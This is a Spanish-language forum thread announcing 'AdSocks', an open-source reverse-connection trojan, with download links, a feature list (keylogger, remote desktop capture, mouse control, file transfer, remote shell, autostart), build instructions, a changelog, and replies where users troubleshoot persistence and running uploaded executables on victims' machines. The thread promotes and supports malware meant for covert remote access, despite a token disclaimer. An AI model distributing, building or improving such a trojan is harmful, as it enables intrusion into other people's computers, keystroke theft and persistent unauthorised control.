Troyano OpenSource AdSocks v0.5.1

Iniciado por AngelCruel, 8 Octubre 2010, 22:04 PM

0 Miembros y 1 Visitante están viendo este tema.

AngelCruel

link de descarga:
http://sourceforge.net/projects/adsocks

si encuentran algun bug postearlo.

Es un troyano de conexión inversa, el servidor se conecta al cliente, asi es mas facil que el cliente abra el puerto que tener que abrir el puerto en todos los servers.

- Captura del escritorio
- control del mouse
- subir y bajar archivos
- linea de comandos
- keylogger
- escucha en 3 puertos.
- autogenerador del server
- Algunas caracteristicas adicionales estan disponible en la version privada http://adsocks.sytes.net



FORMA DE COMPILAR:

esta compuesto de 3 proyectos: lib.class, troyano, adsocks.

compilen el proyecto lib.class despues vayan a la carpeta dist  y renombren el lib.class.jar generado por lib.class y lo copian en la carpeta src del proyecto troyano.

Lo mismo para con el proyecto troyano compilan luego se van a la carpeta dist renombran el archivo troyano.jar generado por lib.class y lo copian en la carpeta src del proyecto adsocks.

Y por ultimo compilan el proyecto adsocks y ya tienen el adocks listo para su uso.

update 0.3.0:
-el servidor ya funciona en linux pero no se auto inicia

update 0.4.0:
- se ha agregado nueva opcion keylogger
- ahora se crea 2 sevidores uno sin autuinicio para pruebas.
- opcion update compatible con servidor 0.3.0

update 0.4.1:
- ya se autoinicia en linux
- se puede activar/desactivar el mouse

updade 0.4.2:
- se ha arreglado problemas en la linea de comandos que dejaba sin conexion al servidor.

update 0.5.0:
- se ha corregido un error grave al bajar archivos
- se ha mejorado la interfaz para juntar todas las opciones
- algunas adiciones listas para un futuro no muy lejano

update 0.5.1:
- se ha mejorado la opcion update de un server para que se cierre lo que esta ejecutandose en memoria y se autoejecute la nueva version.

Nota: El autor no se hace responsable por el mal uso que le den a la herramienta.

usuario oculto

Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)

Debci


usuario oculto

#3
      Subirlo y que se ejecute en el equipo.Pero ahora lo testeo y pruebo con command.


      edito: le doy a cambiar puerto y sigue todo igual.
Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)

AngelCruel

#4
MÃηsaηα:

no se ejecuta hay que ejecutarlo con el command.
el archivo subido se copia en c:\windows\temp

Debci:

a que cuando apagas la maquina y la vuelvas a encender se vuelva a ejecutar el servidor.

nota: la opción update no funciona bien me olvide arreglarlo.

[L]ord [R]NA

AngelCruel, se supone que todo malware deberia tener esa opcion y mas cuando lo que se quiere es tener acceso remoto a un equipo.

AngelCruel

Lord R.N.A.:

yo lo veo mas facil ir a la opción de command en el adsocks y poner:

exed c:\windows\temp\nombredelarchivo.exe

ese es el comando para ejecutar un archivo con el directorio completo.

talvez el archivo que sube no es un ejecutable.

[L]ord [R]NA

no me refiero a eso... me refiero a iniciar con el sistema.

Leyer

#8
1. El servidor no corre en linux
2. Falta un buen manejo de memoria
3. Errores al iniciar el servidor
4. Falta un buen manejo de excepciones
5. Desordenado
6. Problemas el cambiar puerto
7. Trabaja mas orientado a objetos

luego miro mas a fondo :xD

AngelCruel

Lord R.N.A.:

ok

LEYER:

1. si es cierto nesecito que en una linea de bash se agregue el autoarranque en rc.local haber quien postea la solución y tambien en mac.

3.  no agregaba en la lista a los servidores cuando se conectaban varios al mismo tiempo ya esta arreglado gracias por la info.

6. lastimosamente hay que reiniciar el programa despues de cambiar el puerto, pero ahora escucha en 3 puertos.